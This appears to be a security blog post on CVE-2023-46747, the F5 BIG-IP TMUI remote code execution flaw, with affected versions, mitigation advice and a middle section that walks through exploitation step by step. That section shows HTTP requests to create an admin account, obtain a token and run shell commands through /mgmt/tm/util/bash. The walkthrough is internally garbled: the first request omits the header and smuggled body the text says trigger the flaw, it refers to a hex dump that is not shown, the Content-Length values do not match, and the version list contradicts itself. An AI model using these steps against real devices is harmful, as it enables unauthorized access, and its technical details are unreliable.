Unpacking F5 BIG-IP Remote Code Execution Vulnerability: CVE-2023-46747

In the world of cybersecurity, staying ahead of potential threats is crucial.

One such threat that has recently emerged is the F5 BIG-IP Remote Code Execution Vulnerability, also known as CVE-2023-46747.

This vulnerability poses a significant risk for organizations worldwide, particularly those using F5’s BIG-IP devices for network and application traffic management.

The vulnerability can allow unauthorized remote attackers to execute arbitrary code on the exposed Traffic Management User Interface (TMUI) of these devices.

This blog post aims to shed light on CVE-2023-46747, explaining its nature, potential impact, and the necessary steps to mitigate its risks.

Guide to F5 BIG-IP Remote Code Execution Vulnerability (CVE-2023-46747)

The F5 BIG-IP Remote Code Execution Vulnerability (CVE-2023-46747) is a serious security flaw that allows unauthorized remote attackers to execute arbitrary code on the exposed Traffic Management User Interface (TMUI) of F5 BIG-IP instances.

This guide provides an easy-to-follow tutorial on how to understand and potentially exploit this vulnerability.

Understanding the Vulnerability

The F5 BIG-IP Remote Code Execution Vulnerability (CVE-2023-46747) permits unapproved remote attackers to gain access to the BIG-IP system via the management port or its IP address.

This vulnerability may allow the bypassing of authentication, leading to the execution of arbitrary code on F5 BIG-IP instances with an exposed TMUI.

Affected Versions

Here are the versions of F5 BIG-IP that are affected by this vulnerability:

    All versions of F5 BIG-IP up to and including 17.1.0

    F5 BIG-IP versions from 16.1.0 through 16.1.4

    F5 BIG-IP versions from 15.1.0 through 15.1.10

    F5 BIG-IP versions from 14.1.0 through 14.1.5

    F5 BIG-IP versions from 13.1.0 through 13.1.5

Setting Up the Environment

You can download the environment from F5. Simply download the BIGIP-15.1.8-0.0.7.ALL-vmware.ova file and open it using VMware.

To reset the web password, enter the ‘tmsh’ mode and type:

modify auth user admin password admin

Exploiting the Vulnerability

Step 1: Send a Request to the TMUI Module

The F5 BIG-IP TMUI Remote Code Execution vulnerability can be triggered when a specific HTTP request is sent to the login page of the F5 BIG-IP’s Traffic Management User Interface (TMUI).

The vulnerability is triggered when a request containing a “Transfer-Encoding” header with a value similar to “xxx, chunked” is sent to the F5 BIG-IP TMUI module (for example, the login page /tmui/login.jsp).

When a POST request is made to the /tmui/login.jsp endpoint of the F5 BIG-IP server with the aforementioned headers and body content, the vulnerability is activated.

This is an example of how such a request might look:

POST /tmui/login.jsp HTTP/1.1
Host: 192.168.127.146
Content-Type: application/x-www-form-urlencoded

&name=admin&name_before=&passwd=admin789456

The parameters name=admin and passwd=admin789456 are used to create a new account on the system.

Following the POST request, the server responds with a 204 No Content status code, indicating that the server has successfully fulfilled the request and there is no additional content to send in the response payload body.

The rest of the data provided appears to be part of a hexadecimal dump of the HTTP response, which includes metadata about the request.

Step 2: Obtain the User Token

Post the following command to get the user token:

POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.127.146
Content-Length: 22
Content-Type: application/x-www-form-urlencoded

{"username":"admin", "password":"admin789456"}

Step 3: Execute Commands

Use the obtained token and insert it into X-F5-Auth-Token. Then, execute commands through /mgmt/tm/util/bash:

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.127.146
Connection: keep-alive
Content-Length: 22
X-F5-Auth-Token:ICGZXJJROASFRPWYZF3EAQFCGN

{"command":"run","utilCmdArgs":"-c whoami"}

That’s it! You’ve now got a basic understanding of CVE-2023-46747 and how it can be exploited.

Securing F5 BIG-IP Devices from Vulnerabilities

F5 BIG-IP devices, widely used by governments, internet service providers, telecom companies, cloud service providers, and other large enterprises globally for network and application traffic management, have been exposed to vulnerabilities.

Administrators are encouraged to apply the hotfixes provided by the engineering team as an immediate measure. These hotfixes serve as temporary solutions until software releases with permanent fixes are available.

The vulnerability, known as CVE-2023-46747, is only exploitable if the Traffic Management User Interface (TMUI), also known as the Configuration utility, is accessible via the internet.

To mitigate this risk temporarily, administrators could limit access to the Configuration utility. This restriction could be limited to trusted networks or devices, or specific IP ranges.

It’s worth noting that the TMUI portal should not be publicly accessible via the internet.

Over the past three years, there have been three unauthenticated remote code execution vulnerabilities within the TMUI portal, including CVE-2023-46747.

If access is required, it’s recommended to ensure the TMUI portal is only reachable from the internal network or through a VPN connection.

Conclusion

The cybersecurity landscape is ever-evolving, and the emergence of vulnerabilities like CVE-2023-46747 underscores the importance of staying vigilant and proactive in addressing potential threats.

While the vulnerability presents serious risks, it’s reassuring to know that there are effective measures available to mitigate these risks.

By implementing the recommended hotfixes and restricting access to the TMUI, organizations can protect their F5 BIG-IP devices from this vulnerability.